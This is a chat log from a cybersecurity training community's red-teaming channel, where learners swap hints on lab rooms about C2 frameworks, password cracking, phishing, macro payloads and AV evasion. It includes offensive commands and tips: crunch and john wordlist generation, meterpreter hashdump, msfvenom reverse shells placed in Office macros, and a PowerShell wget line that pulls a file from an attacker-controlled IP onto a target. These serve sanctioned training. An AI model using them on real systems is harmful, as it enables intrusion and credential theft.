#red-teaming-path

For Ticket Event related inquiries, please use the #1017019049181450291 channel (in the Support section). 
Hey! I need some help with setting up the page at Gophish. I cant get the html code to work
Hi all . Im at Red Team Fundamentals, Red Team OPSEC Room.
I quite lost/confused even after reading the hint for task 7. What do they mean four question ? Arent there 5 ?
okay, i geddit. now i know why there's 4 question.
I signed into Discord this morning about the same exact question! Admins, I think you need to re-word this one...
oh wow they now include some network rooms on paths.....
i hate this question
I mean AD is a fundamental element to most red teams. And a network is the best way to learn AD
true
hahahah so its not me
because i was so lost at the question. and yeah i think that task question have to re-structure abit
"red team white cards" comes with plenty of references
Yep, bad googler. Thank you so much
Gave +1 Rep to @brisk path
white team red cards not so much
A good example of a white card is in the case a threat simulation calls for the use of 0day vulnerabilities. In most cases there are none available to a red team, so the use of it is simulated (as if it was used) in a particular attack scenario.
Lol yeah the content has been really good but that question was beyond confusing. I just bruteforced the answers and still they don't make sense to me what they are asking for
In the Intro to C2 room on Task 6 I am only able to get the NTLM hash of the Administrator user and not Ted
Any ideas as to why this is happening
I'm in a Meterpreter shell and can get the other hash and flags fine
I used the 'Registry Method' to get it to work
Using 'hashdump' in a meterpreter shell like normal didn't work for me
This is the only question that I need to complete the room
nope check the navigator... there is another thingy
shadow recommends you check the hint and check navigator too
have you opened a shell as ted and then ran hashdump??? or using meterpreter and kiwi
also, make sure to scroll enough! everything related is highlighted so it should be doable to find it
am i the only one having trouble on Task 7 in "Red Team Threat Intel"? I cant seem to find the correct answers/order
am i doing something wrong or is there a bug in Post Compromise - Enumeration task 3
it says the version number is incorrect
nvm i forgot to do ssh lmao
You found it already?
na sadly not
It is pretty "simple"
Use the Att&ck navigator
Search for APT41
And then match the TTPs to the chain
if that's the one where you are stuck at least
Yeah im already on the "map" of APT41 on Att&ack and tried to search for the Words in the Hint but i only managed to find 3 of them in APT41 and if i just fill out the other 2 it says something is wrong
yes exactly thats how i found the 3 words but i cant find the others
If you have all APT41 highlighted you should have multiple options to be honest
You got it @languid surge :p
not yet ...5/6 now and the lolbas thing is missing ... Hope i got more luck tomorrow 🥲
can I DM you?
sure
Hi, I'm trying out this new path and I can't understand what's wrong with this crunch 5 5 -t 'THM@!' -o tryhackme.txt as an answer to the password attack room in task 4
I ran it locally and it does what is expected
it is asking you to use the one for generic symbols to be used not just those 2 specific ones
I am lost with one instruction on this room: https://tryhackme.com/room/redteamthreatintel
To use the ATT&CK Navigator: navigate to the groups summary page, next to "Techniques Used," navigate to "ATT&CK Navigator Layers," from the dropdown navigate to "view." An ATT&CK Navigator layer should have opened with the selected group's TTPs highlighted in a new tab.
@- lower case alpha characters
,- upper case alpha characters
%- numeric characters
^- special characters including space
Referring to: https://mitre-attack.github.io/attack-navigator/
Where do I find the "groups summary page"?
first you go here: https://attack.mitre.org/
then you click groups
then search for the group name using ctrl + f
then check a bit down the page under the box and there is a button for opening navigator
It's a bit confusingly phrased when the hyperlink in the sentence before this one reads "ATT&CK Navigator" and points to https://mitre-attack.github.io/attack-navigator/.
Thanks for clarification.
no problem.... hopefully you can answer the questions now
Yup I am unstuck now
Understood! I didn't get the question right. I'll try to generate it using special characters
Hello
Can I get some help :)
My last final question and yes I did Google but
It is in the text above
Have you tried ctrl+f to search the answer ?
I cannot give a better hint than suggesting you to read the paragraphs above once again
Look for ||Operators are also expected to||. It's in that sentence
should be a fun weekend ahead with this new path, but its kinda double edge sword by having some of these rooms done already in regards to the getting the tickets
def aint resetting all the AD rooms haha
omggg i got it
i should of used the number 3 insted of three
oh my dayysss
i love u Robert
the asterisks are there
the answer format (number of stars in the box) is an important thing
thanks so much
I know what you mean... Luckily i haven't had time to do all of the AD rooms
they are all great but too much time to go through again
Anyone having a difficult time finding the answer to the LOLBAS question in Task 7 - Creating a threat intel driven campaign?
which room?
red teaming - red team threat intel
Have you looked in the MITRE link?
I had some difficulties too, but I searched on the web
Yes, I may just be searching the wrong material gonna go at it for a bit for before moving on
I could not find a direct answer or a push in the right direction, might have to take a break and revisit it
You're looking for ||Technique T1105 in there|| . Knowledge of https://lolbas-project.github.io/#/download can also give you an idea of what you're looking for in the future
(very useful website)
Gonna use your spoiler as a last resort, I've looked on github for a few minutes. I'll look deeper. Your input and advice is greatly appreciated
Got it! Thanks!
Gave +1 Rep to @pseudo mist
Hey friends I have been battling with this for hours I'm not really sure what they ask us to do, can someone please give me some sort of idea
Number 1
I can't enter the room at the moment but I think you need to enter the technique names as per the table in the top of the screen shot
try using those and put them in the correct order
Thanks friends I figured it out
great
So shadow recommended this order. After what pathway should I start doing red teaming path?
#pre-security-legacy-path
#974406074444685322
#junior-pentester-path
#pentest-plus-path
#web-fundamentals-path
#offensive-pentesting-path
#791764435991658556
Hello friends please can someone take a second to explain what we are suppose to be doing here ? Just find it so hard to understand what the question is
Would appreciate as much hint I could get thanks
You have to associate "Knowing that their company..." to "Assess risk" (4), "This will depend on the company and the blue team" to "Apply appropriate countermeasures"(5) and so on
But it doesn't make sense to me honestly
Typo on OPSEC page @elder olive
Anyone else having issues with GoPhish constantly spinning?
yeap having the same issue :/ the infinite loading of death
ok just checking. I was excited to use that tool too lol
samee! it looks really cool ^^
I just went ahead and downloaded the installation to my linux machine.
forget about the hint, the hint was quite confusing.
look at the answer field , the first 2 number they give u is the right answer. so 1st bullet falls under RISK (4) and 2nd bullet falls under COUNTERMEASURE (5).
so you are left with Critical Information - (1), Threats - (2) and Vulnerabilities - (3).
So when reading the bullet point number 3, which number (1,2 or 3) do you think it falls to ?
something like that .
yeah i agree. i really like the content they give for this one. so far i been learning a lot about red teaming engagement so far. anw i tried to bruteforce and it didnt work. maybe i do it wrongly. took a coffee/smoke break and got a lightbulb from it. thats how i clear that question
Can someone help me with this question in Room Enumeration Task 5- DNS question 1 , I use Dig to carry out a domain transfer, but it not return the flag ? any hint for this task, Tks all.
which room?
Hello, hope all are enjoying it
learning path Red-Teaming - Post Compromise - Room Enumeration- task 5- DNS
you need to use the right dns server
if you stuck, just read the task again
Just started the red teaming path
Trying to understand this, if armitage does not listen on loopback, then why does the example bind the port to the loopback address?
Intro to C2 room
Can i get hint for these questions?
Say you already set up teamserver on port 55553 on your C2 server, which is on 192.168.0.44. You can now use another unix machine (lets say 192.168.0.100) to access that armitage server that you set up by port forwarding.
The full command is 'ssh -L 55553:127.0.0.1:55553 root@192.168.0.44'
- Means: I want to Port forward port 55553 from 192.168.0.44 to my localhost which is 127.0.0.1 on port 55553.
So now, when you open another terminal in 192.168.0.100 and run ss -tulpn, you see that now u have access to your armitage server on your localhost 55553.
Feel free to correct me if im wrong. im always open to improve myself 🥳
Look at the Mitre Attack Website on APT 41, there's a few way on how they transfer files.
Look for 'messages' in that page too for the 2nd question.
Guys, I've been stuck on this question. Evading logging and monitoring lab for the past two hours. Please help me.
@potent crest I think I get it: the admin sets up the command shown in the example, but another team member would use the syntax you wrote in your example.
Yes sir ! You can try it tho to understand better with hands-on ! 🥳
If you have a look at Task 7, what kind of GPO logging is common? (If you're having trouble with this kind of thing i definitely suggest going back through the task/tasks and re-reading bits)
I'd recommend looking at the MITRE link. there's also a hint at #red-teaming-path message
will do!
Hey guys, I am following along the "Intro to C2" room and i am trying to run armitage on my own laptop. I've started the teamserver and I've connected successfully, but when i try to start a listener in the armitage I am given an error in the console that says "Timed out while executing 'use exploit/multi/handler' last read = {data=, busy=false, prompt msf6 > }; current prompt msf6' " After that i am presented with two or three errors of the same kind. Does anybody have an idea how can i fix this. Thank you in advance.
My guess would be connection issues. what OS are you using, and have you set up the VPN and tried to ping/scan the host?
I am using Kali Linux 2022.3 . And no I've not started the vpn, yet, because I didn't think it was necessary to be connected to the THM server
aren't you trying to exploit the VM in the room? I may be wrong as I ahven't done that room, but that's normally how our rooms work.
I've not yet reached that part. There is a task before it just to set armitage
Hello guys, maybe someone can explain about John the Ripper "Single-Extra rule", how to use it? Password Attacks room
BTW I've decided to skip this step and go onto the next one. Surprisingly enough i was met with the same exact error but with a different listener 🥲
In the Password Attacks section, part 4, question 2. I ran the crunch command in terminal to generate the list to produce what it wants, but it's not accepting it as the answer. Am I doing something wrong?
you made a mistake
Gotcha .... any advice on where I messed up?
in Crunch command
im stuck (not in a washing machine) but at the obfuscating challenge-8.exe
obfuscation principles
That one made me laugh, what are you having trouble with?
getting the flag
like getting rid of meaningfull identifiers
i dont understand maybe my brain is broken
Walk me through what you're doing, how you've obfuscated, what you do to compile and anything you do after compilation (hint hint)
so
i took the snip like they tell to do
i look and i think removed MFID
compile with mingw
to challenge-8.cpp to challenge-8.exe
nm + strip
and send it
wrong as it seems to be
so i retake the snip
and im lost
i dont know wtf im a doing
So, you might want to chuck in some code flow and logic stuff, that does nothing except obfuscate, have you renamed variables, split up strings etc?
NO
OK THANKS
I KNEW IT
no i didnt know
mayber im not obfuscating enough
@pseudo mist can you explain to me in a voice chat ?
Sure, I'll head down ther now
Hello friends I'm trying to solve the C2 room task 4 but each time I try to set up the machine using the preparing our environment instruction provided after the first start that have to do with starting postgresql...
When I try to run msfdb --use-defaults delete
I get an error is there anything I'm missing help mate
@jade flume are u using ur kali or tryhackme ?
try to run sudo teamserver <your ip> <secret>
I try to use my machine but have problems with the installation so I switch back
To attack box
I have to try this and see if it worlds thanks my man
i now understand why you said that it will be more hard after the obfucations principles
im stuck on downloading the file because WD delete it
and i cannot download it from the web it said access denied
🤣
oh, yuuuup, use SCP via openVPN directly into a machine that Windows Defender can't see (or set an exclusion for a folder, like there's the exclusion in the VM)
you almost have the correct command.... just 1 letter/character is wrong.... and it is in the ||THM^!|| part
I appreciate the follow up, I was able to figure it out
Also struggling with finding the answer to the first one. Second one can easily be found with CTRL+F-ing the appropriate ATT&CK page
https://tryhackme.com/room/opsec task 7.... question 1.... shadow is super stuck.... any hints???
did you check the: https://lolbas-project.github.io/#/download website robert linked to???
definitely helps to have the background knowledge for that one
Oh... That... The first bulletpoint is a risk (so 4), the second bullet point is a countermeasure (so 5), the third is a... We're looking at getting this re-designed
yeah understood what the first 2 was based on the hint and that the answer box kinda states it
just all the other combos after seem to not work even when shadow thinks they are right
so they just left and decided to do command and control instead
after watching a video about cheese to calm down
I can send you a DM, but it's basically gonna be the answers, as that isn't an easy one to explain
if you want to you can do that.... shadow would not mind.... better then trying all the combinations through brute force
+rep @pseudo mist
Gave +1 Rep to @pseudo mist
When you do the --rules in john and run it what is the syntax to out put that to a file?
if you run man john it should tell you, or maybe john -h?
I am not seeing it in either one
--stdout
then | tee blah.password.list.txt
Thank you! I totally forgot about | tee, but I just used > list.txt and it worked also. Thanks again.
Gave +1 Rep to @royal void
no problem
and yeah remembering the stdout parameter/option/flag to output is kinda tricky
though you can grep for it
Well, I read that and was trying it but I was obviously using it wrong lol.
thanks
Gave +1 Rep to @pseudo mist
I see, so many guys got red teamer titles
anyone had any issues so far in the "Phishing" room with the GoPhish machine just getting hung with a loading animation? (not nginx error) have already tried clearing cache/history and multiple web browsers as well as re-deploy of the machine. loading animation is on every page
on the obfuscation task 7 Arbitrary Control Flow Patterns, the sample code doesn't compile because of a syntax error with case.
The line is
" for y in case_1:
match swVar: <<--
case 1:"
"
and the error basically says invalid syntax. I tried other versions but it didn't work.
I ended up changing to an if elif and got the flag but IDK if there is something obviously wrong
same issue, i cannot add new profile , loading animation all page
I had that issue yesterday. I honestly can't remember if I used open vpn and a browser page or if I pressed the view in full screen arrow. Probably open vpn.
On Evading Logging and Monitoring Lab I got this error. I am on the final stage. I did all the steps 5 times, but didn't understand. I have been doing this for four hours now.
can I dm someone about password attacks task 9? I don't want to post any spoilers.
What am I even supposed to do here? I have no clue
The hint is also very confusing to me
Room -> https://tryhackme.com/room/opsec ; Task 7
They want you to put them in order. They give you the first 2 numbers so you have to figure out which number comes next. Make sure you put spaces in between each number.
been stuck on the DIY sandbox evasion challenge for about 4 hours lmao... Everytime I run my c++ script it does this, can't seem to figure out why
Yeah it didn't make sense to me either. I just brute forced it because it gives you the first 2 numbers... so just put the other numbers in every order you can lol
want the answers???
or will you just brute force it like everyone else???
just realised I need to wait -_-
Had the same problem while I was connected using OpenVPN. If someone has this problem try connecting to the site using the attack box, it solved it for me
need to arrange them in order
tks , using attack box , it solved
Anyone already finished on Win10Office2016-Installed under Weaponization? I would like to know if you guys used the rdp to run the scripts? and where did you input the code?
-- answered my own questions
I have had this VM running for about 15 minutes but it's just stuck on the spinning wheel of death. If I click "New Profile" or anything else - nothing happens. I have closed and re-opened as well as signed out and back in. Is this a common issue? I'll just try to reboot the VM in a little bit if it doesn't start working.
access link on Attackbox, it's OK
what happens after the 3 day access on the Breaching Active Directory room, do i just lose access to it forever?
You can just join again. We do that to flush inactive users from the network to save resources
ok thanks a lot
Gave +1 Rep to @white prairie
None of the valid combinations work though
Are you making sure they have spaces? I went through that yesterday and it worked. I agree that it isn't easy, but they do work.
Had the spaces, but used enter to submit, which didn't work. After clicking submit button explicitley it did work, finished room, thx for your help
Gave +1 Rep to @pseudo mist
I got the flag in a different way but it says it's wrong.
I believe I sometimes struggle understanding the question correctly
like this one: "What is the crunch command to generate a list containing THM@! and output to a filed named tryhackme.txt?"
I literally spent half an hour on this question, the learning curve is present
not all of those 1's should be 1's
How can I fix this issue on a Kali Linux machine?
this is for the dictionary attack on the hashfile
and where to run it then? :/
I am running Kali inside Virtualbox
the solution seems to be more simple by just assigning more RAM to the Kali machine
it takes a couple of seconds when you assign 8GB RAM to the VM
Hello fam, just started my red teaming path ! Any tip or suggestion for someone starting from almost 0
If you're brand new the #junior-pentester-path might be suitable, it's aimed more towards beginners π
Iβm subscribed to the website so looking for the best courses to start with
Gonna def check that
I would personally also recommend the complete beginner path
it contains lots of interesting basic concepts
true
because I am personally a bit surprised by the No prior knowledge for the read teaming path
if you dont know Linux commands it will be a difficult one
as well as understanding other basics
but again, this is my personal opinion
It is recommended to complete the jr penetration tester path before red teaming
I would also suggest do use the 'Easy' pathways first. (Pre security, Complete beginner, introduction to cybersecurity). Then proceed with the jr pentration tester OR the red team path.
I appreciate ! Thanks
I didnt get a rep π’
Into to c2 room, need help with armitage, I can't get meterpreter shell, i used metasploit for the same exercise and it was flawless, but the task says to use armitage.
I can use exploits i get direct shell , and can't run commands like hashdump, i tried using the post/windows/gather/hashdump module , i get incompatible shell type
What is the crunch command to generate a list containing THM@! and output to a filed named tryhackme.txt? can help me out
@ornate hull the option is "3 letter word + special characters"
Thank you mate i got it i just tried in my kali machine
Gave +1 Rep to @potent crest
nice one sir !
You need to put THM(and symbols) bit in double Quotes, and that ! can also be any other special symbol.
@ornate hull very close, replace the exclamation mark with something similar there
^
crunch 5 5 -t "TMH"^ -o tryhackme.txt
yeah, there's some flexibility on the answer as there's a regex to check if it's "right", but 3 characters out will defo be over
the quotes should be around the symbol bit too
so crunch 5 5 -t ||"THM^^"|| -o tryhackme.txt
thank you
yeah i realise that ! i think i did submit a single quote around it but fail. When i submit without the quote it work, but after reloading then i see they included the double quote already.
it was a rollercoaster ride for awhile
sorry i was trying with TMH not THM
trymehack doesnt work bro, but honest mistake down there haha
Once you have the cmd.exe shell, you'll need to escalate that shell to a meterpreter shell
my bad
aaah man, I am gonna be so mad if the password crack is wrong
128 tries/min and there are 50k passwords to be tested
it is the online password room
which task ?
or I am making a mistake
task 8, the one where you need to make a rule-based dictionary
as a rule of thumb, thm rooms shouldn't need bruteforce of longer than approx 5 minutes
tbh I followed the steps, made a list clinic.lst as said, make the dictonary adding 2 numbers + a symbol
and that made 50k passwords? seems excessive. I may be wrong though
well .. I did use like 6 different symbols since the symbol itself wasn't shown
just use crunch with the ^ symbol
it still gives you a lot of options I believe
Hmmm, i see the hint is pointing you at john rules, so i may be wrong with crunch, but i'd probs stick to just the 4 used in the demo in Task 6
that's a start. I'll wait for someone who's done the room to chime in
cool exercise to be honest
stuck at this point as well. Did you manage the smtp password? I always get "[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 454 4.7.0 Temporary authentication failure: Connection lost to authentication server" This is not normal, right?
yes I got it
well it is normal
because you don't have the password yet
maybe your list is not well populated
Did you make a rule-based dictionary changing the john.conf @brave sinew
ah, this is basically the message for "wrong password"? for me the message sounded more like " hey your AUTH method will not work at all"
Then we have to wait some more decades. this is slow. (i used mentalist to generate a wordlist)
well to be fair
if you have the right dictionary
you should have it in less than a minute
^agreed. Once you have the right dictionary it takes about .03 seconds to crack
glad to hear it
https://tryhackme.com/room/signatureevasion
task 7 i dont understand shit
how can i encode manually to set my host my port and the runshell
confused My wordlist from task 7 has 105 entries. the rules multiply it with 200. and i test ~100/min.
So I got stuck on this for a while also. I kept changing my rule and building out different password lists until I got it. My final pass list was only about 20 words.
I don't know how much of a hint or bump you want or I am aloud to give on here.
So, as I said, I'm doing Active Directory Basics, at Task 4 where we have to found the flag on Sophie's desktop. When I'm trying to Connect to sophie account I get this :
ahh wait. I think I missunderstood the task. Thanks, will try a bit more
Have I done something wrong ? ^^
Are you connecting from the attackbox/your own VM, or from the windows machine in the task (this one probs won't work)?
windows machine
First exit out of Phillip rdp^
oh ye I'll try that
The in-browser machine counts as a RDP session, so connect from another machine
I'm currently in the Network Evasion -> Firewalls room. Stuck at task 7. I'm not pretty sure how to setup the port tunnel, someone has some hint? (pm also possible)
in "Introduction to Windows API", Task 7 q "What type of method is used to reference the API call to obtain a struct?"
I can't find answer to this? Is the answer available in the Task 4 content or I have to read MS docs to find the answer.
It is available in the task 4 content, the shortened version of it is highlighted as code, but it's towards the end of the sentence.
(and yes i feel like i'm writing riddles trying not to give it away entirely)
O thanks
Gave +1 Rep to @tulip pulsar
did it work already?
Not all rooms are free right?
Correct, About 80% of rooms on THM are free, but that percentage may not be representative of a path.
YES :). Just wanted to say I reduced the wordlist to likely passwords and it didn't help, but my larger WL finally succeeded. Didn't expect this password to be the solution
2 more passwords to go in this room
yes I am working on the last one
Task 9 for Password Attacks Room.
Any hint for the year and special characters ? I already tried 2021 and 2022 with !@#$ as special character. Am i missing something here ?
@celest vessel lets go
you found it?
still trying
ahh i actually got, just that it didnt stop when found the password
i fixed it
hahahaha
yall im in sandbox evasion room and unable to compile cpp files, all it displays is "attach". how are we supposed to compile it? im trying to compile a sleeper file into exe
did you make a list then @potent crest ?
yes
i make a list as the hint suggested
- manage to play with some rules i learn in that room too.
hmm 500 tries, no hits
with john
got it, something with capital and non capital letters
going to take a break
fixed it
@ornate hull - @pseudo mist assist you by giving the spoilers already
@potent crest I will figure it out
does any one completed sand box room
dm me plse
plse helpppppppppppppppppppppppppppppppppppppp
Task 5 - Phishing Room, is the website lagging ?
More people are getting on so could be the case
I require help with task 7, flag 14. Can anyone assist me?
There's a lot of questions already solved in #999008613102260275. If you can't find a solution to your problem, just drop a line there and I'll help
Hi, i need help in understanding what i need to do in a Task, dont whant any answer but my english is not the best and i have not figured out what i need to answer in the web page.
Its in Red Team Threat intel - Task 7, the web site
Check out the hint!
Thank you, i think i overthinked it
Gave +1 Rep to @wanton nacelle
Happy to help!
@jade flume hello
I just saw this and can u help me with those 3 questions, the picture is kinda blurry
open the APT41 page and read it thoroughly
okay 2 done , still stuck at this tho
@manic shadow it in APT 41 software table
This ?
@manic shadow Yes the
Alright if this is the right page to search in...
I seem to not be able to figure it out
@manic shadow it the ||ASPXSpy||
Thanks , I appreciate the help
Gave +1 Rep to @ornate hull
@manic shadow Anytime mate
still missing the two http-form password attacks. So many options what rules to apply.
haha
are you still working on that one?
I found the http to be a bit more simple
had a break with other things to do, but basically, yes
I get you, I also took a break
is the password format given in smtp task valid for the website = all passwords or just for this specific smtp password?
even with the walkthrough it says false i dont understand
22 WSAConnect 22WSAConnect False 58 WSASocketA 58WSASocketA False True 5A WSAStartup 5AWSAStartup False True A5 htons A5htons False
only for the specific smtp
Hi, can anyone assist pls to explain an answer in the Red Team Threat Intel Room Task 5 TTP Mapping question "How many Command and Control techniques are employed by Carbanak?" I got the answer by a process of elimination but in the mitre-attack data there are 16 C2 techniques listed - can't work out how the answer is determined. Many thanks
Not all of these 16 that are available are selected in the navigator
if you scroll up and down some of the boxes are highlighted in blue....
Thanks for the quick response. The penny just dropped for me as I was doing task 7. Appreciate the help.
Gave +1 Rep to @native berry
ooh nice you figured out how it works
Thanks @royal void appreciate the help.
only 1 rep point giveaway every 5 mins... but yeah no problem
- @royal void
Gave +1 Rep to @royal void
Always worried about the rep
¯\_(ツ)_/¯
Evening all
Dropping something for people to find when searching. The GoPhish task in Phishing will spin. However, on your VPN system, go to the site https[://]YOUR.LAB.IP:443. It should load.
Doing the above will allow for completion of the task just fine. Happy hunting!
Thx answered my question before I even asked. Lol
Red Team Theat Intel --> Creating a Threat Intel Driven Campaign --> Kill chain site has 6 answer options instead of 7
Did anyone else answer those answer those questions?
@fresh harness start with weaponization
I'm sure I did. Is that the one with the flow chart that you fill in the blanks for?
2-7 in kill chain
The iconography is infuriating.
Just as a general tip, it's subtle, but you will find a red line under the ones you have wrong.
@fresh harness That question drove me crazy
Ahh, you're supposed to look at the APT in the question and put down a technique they use into the correct blank.
@fresh harness hit hint tab
So, if they use Scheduled Tasks for persistence, the answer would be Scheduled Tasks.
I see. Thanks.
Gave +1 Rep to @molten summit
Hello mate, I'm having problem with weaponization room, task 5 I have been able to make the calculator pop up but I'm trying to chain it with a reverse shell like it was instructed so I generated a payload with msfvenom but the issue is after getting the output and Saving it in Microsoft I could not open it I get an error, so I have few questions that I could appreciate anyone that could help me with it, do I have to save the file as document1 or doc to make it work and again do I have to include the extra payload in the document or just output of msfvenom only
Just the output of msfvenom, I believe.
Also, there is one thing to change in the msfvenom output of the VBA script that they mention. Don't miss that!
I get compile error mate
That's from me trying to run it
To make sure it's working from saving tho
Does that matter at all ?
Or do I just save and see if it works
I'd say put what you get from msfvenom into the macro, nothing else in there. Save and re-open the doc.
Thanks man
Feel free to make multiple docs for each of those steps, like one that just starts cmd, and another doc that starts calc, and another with your reverse shell.
And I think as a bonus, once you get meterpreter to connect and get a session, look up how to download files from c:\users\...page, and save your docs to your local system!
Just note that you need two slashes for that command....Discord doesn't like that, though. C:\ \users\ ....
Yes right I get the point you the man respect
good luck!
It work already thanks man
Be sure to use https.
You mean for real-life scenarios?
Well, I mean yeah it's generally good advice, I suppose.
can any help me in password attacks on task 8 rule based event
How do we do that? Can I use python still?
I'm yet to do it mate, I should be on it now
@jade flume done mate
find this article it should be useful for others so I thought I could share...
Anyone available for help on Windows Local Persistence Flag 17?
I'm yet to get to that mate, would have loved to help
No worries man it is kicking my a$$ right now.
I need help mate, password attack, task 4. I inputted crunch 5 5 -t THM@! -o tryhackme.txt as the answer but it won't allow it, so I changed it to 7 7 THM@!%% but the problem persists. Is there anything I'm missing here?
Damn I can only imagine my man lol this is hacking for us
Try cyberchef, if you're having problem
I had the same issue
You almost have it, everything is good with the 5 5 command except one thing. So go back and read there is a certain character you can use for "special characters". Then think about what you use to combine a string?
Sorry trying to give help without spoilers is not my strongest ability lol.
Task 9 in password attack season + year + special characters I am doing anything wrong
Oooof
You have it?
Otherwise I might give a small tip
Cannot get armitage running in room INtro to C2 Task 4. I am getting following error message when launching armitage:
Exception in thread "main" java.awt.AWTError: Can't connect to X11 window server using ':0.0' as the value of the DISPLAY variable.
I am running kali 2022.1 on a VMware Fusion on a mac m1
Can sb helps me in the "Windows Local Persistence" Room flag13? Tried everything but didn't work
Hello, anyone having trouble with the Phishing room? I cannot get the GoPhishing to load properly. In dashboard the loading animation keeps on playing and I can't create any new profile/campaign
Hi,
I am stuck at Task 8 (Using MSSQL as a Backdoor) of Windows Local Persistence.
Does anyone know where should "evilscript.ps1" be located? At attacker or active machine? Thanks
I think it should be the active machine
Hey mate, I'm having a problem understanding the task 8 question in the password attack room: what word list were they referring to when they said clinic.lst?
Someone help
Noted & thanks
Gave +1 Rep to @jade flume
It is referencing the password list you create in Task 7 from clinic.thmredteam.com
Damn thanks I get it now 🫡
Gave +1 Rep to @naive lily
Did you get the hydra one done? Or stuck on smtp?
I'm having issues generating the word list, but I'm used to using hydra for brute forcing all sorts of network services, that should not be a problem on its own at all
Task 7 gives you the exact command to generate the base wordlist. Task 6 answer is how you should modify that base wordlist to answer Task 8
Task 7 + Task 6 = Task 8
I need help with task 2 on Signature Evasion lab. How can I split DD or split because Windows doesn't support these commands?
Port 22 is closed. How can I scp the shell.exe?
Maybe setup a web server then you use powershell -c wget "http://yourIP:port/file_to_get"
how can I start a web-server on windows machine?
Im on the phishing room, and the gophish website just skips spinning, not responding
If you are trying to send from windows then it's better to use pscp directory to file you are trying to send user@ip/directory_you_are_trying to_send_too
.
Maybe I'm missing something about how this documentation is written, but why is the date range labelled "engagement dates" not the answer for "engagement end", preferring instead the date listed for "post exploitation and persistence" (also why does this phase fall outside the engagement period?)
Red Team Engagements, task 7
https://tryhackme.com/room/passwordattacks
task 8 question 2
i keep getting this error message
"/etc/john/john.conf" E212: Cannot open file for writing
tried it with and without, same error
the folder does not exist /etc/john
Ok
Thanks pope
No problem!
thanks @celest vessel
Gave +1 Rep to @celest vessel
Try to change from command to windows powershell
Sorry for the late response
i sorted it
Is there somewhere to post general feedback, just so it doesn't get buried?
The style of questions of the "view site" sections in this path so far are pretty confusing at best, this is a particular offender.
yes a lot of people struggled on those
It's not even clear what exactly it's asking
I would also like someone to acknowledge my previous question, if it is indeed an error
you have to match each response to one of those topics
each number is only to be used once
I tried in both cmd and powershell.
Those questions could be slightly useful if it would pause after you get the right answer, so you can try to decipher wtf it's the right answer.
But as they are, that was a step back, learning-wise.
Or make some kind of matching interface
or just do each one at a time
Instead of typing in a string to match statements together with no feedback, with poorly worded instructions
This works, but I'm guessing there's a reason they departed from this being used in every other path
I believe a lot of people bruteforced the answers
to be fair, I also found it to be a very weird thing
The first one or two I did, because I had no idea what was going on. Then when I tuned in, it still made no sense.
So yeah, I bruteforced them all and moved on.
People understanding the content but not being able to answer the question seems like a worse alternative
people who bruteforce are still going to find the answer, or a guide
I am not sure what you mean but given that the first two digits are already shown, filling in the last three wasn't a hard thing to do
and a lot of people already posted comments about that section
It's being redesigned.
Scratching my head over this bit, didn't even realise it says "Coutermeasures"
*Covenant by Ryan Cobb is the last free C2 Framework we will be covering*
The section about sliver is after the section on Covenant, which is also free unless it's in the wrong section
Has anyone completed the phishing room
I am positive someone has, yeah
I am working on that one as we speak
yes what is your question???
Task 5 using, go phish the website doesn't work none of the buttons work, I'm supposed to create a new profile
For the GoPhish portal, don't use the public address/link. On your VPN system, go to the site https[://]YOUR.LAB.IP:443. It should load.
reload the web page.... after waiting a few mins for it to start up.... then it should work
the public link worked for shadow after letting it start up for 5-10 mins
You have the patience of a creature of the night.
heh yeah that is a skill shadow developed when downloading games in their kid years..... steam game downloads on old dsl modems were slow as molasses
This worked thanks
Gave +1 Rep to @molten summit
Just tried it again, the public link still doesn't work
okay then.... guess it might be slow or buggy
I didn't encounter any issue with the website (opened in Kali while being connected over the VPN)
I sort of suspect it the js may be referencing something on a private address, and if you stay fully remote it just spins until a possible timeout. I didn't bother to check too hard since I'm not THM QA. π
oh yeah.... shadow had to disable some firefox extensions for it to work correctly
ahh that's an even better idea probably.
mainly dark reader as everything else shadow has disabled for tryhackme domains by default
I am having trouble with this question been over the task and don't see the answer in there (What setting name that allows you to modify the Host header in a Meterpreter payload?)
Google can probably fill in any blanks the room material has left out.
msfvenom -p windows/meterpreter/reverse_http --list-options
then read through the options and you should find it
am I the only one that ran into a brick wall in password attacks > online password attacks?
prolly took like 2 hours to get the http flag
still got nothing on the other 3
is the dictionary built with the "rule" [symbol][dictionary word][0-9][0-9] supposed to be ~500K words?
if anyone could help out that would be awesome, I'm not understanding where to find the Access Types?
oh damn, I see it. I've been doing this too long today haha
Which specific service on task 8 are u stuck on?
Was all of them
Had multiple sessions running for hours against burgess and pittman
Wound up finding the other with a lateral move from another task
Ftp was just available in browser, don't think that was intended
sort of, I believe browsers try to use an anonymous login silently.
or something like that.
Anyone run into the issue of the Weaponization - Visual Basic for Application where the document is closing when attempting to reverse shell?
When doing all the other listed steps it works for loading Calc, opening the popups, etc, but copying and pasting the VBA script from msfvenom it closes before a reverse shell can open
Did you catch that you needed to change one thing in the msfvenom output? Not sure that would cause closing behavior or not.
Yeah, I even tested both in Excel and Word, both just crash out
I thought it was just a bad script made a new macro and it still loads, then crashes
Only the msfvenom output is in the macro, yeah?
If so, you could maybe try to regenerate that, though I bet you already did.
yeah I even attempted it in attackbox instead of my kali VM and it still crashed
Already attempted both in Attackbox and my personal KaliVM
boo
beyond that maybe recheck ports and IP addresses, but, even a bad connection shouldn't close the doc.
I get a semi connection using nc -lvp 4444 and it connects but doesn't connect to meterpreter
you're in metasploit to upgrade to meterpreter, correct?
yeah
or rather catch it and do the dance that is. hmmm
it doesn't crash word when I use nc to listen but when I use MSFConsole after verifying a connection using NC and manually start the exploit it crashes word/excel
does it crash pretty quickly or does it take a few minutes?
It takes about 1-2 minutes before it crashes
but not enough to get a meterpreter through and do any commands?
nope, going to try the kali optimized to see if it is an issue as I recently updated my metasploit framework
but if it works in the kali instance on THM but not attackbox that is strange
I wish you luck, I have no other ideas. Mine worked pretty well with kali 2022.03 defaults. I think the only thing that deviated from the instructions would be after successful connection and doing a run post/windows/manage/migrate to keep it up.
@molten summithave you finished the active directory basics redteam room?
Looks to be an issue with MSF6
im stuck on https://tryhackme.com/room/winadbasics task 6 . i cant find the network share used to distribute GPOs to domain machines.
ive done all the gpo configuration and updated it and rdped like it asked. ive checked all over the gpo settings for it
It's in the task materials/text.
hmm well that's a bummer, but also nice to get an explanation.
also no idea why/how? but it still crashes word as well even with msf5 but I'm actually able to get a connection but not to meterpreter in msfconsole unlike before
i overcomplicated it @molten summit
It's all good, I bet you learned a bunch.
So I'm able to get a command shell session but after running any command it kills word
I had to respawn the machine to fix it, guessing it was a bad connection or something
Could help
?
Password attack task 9
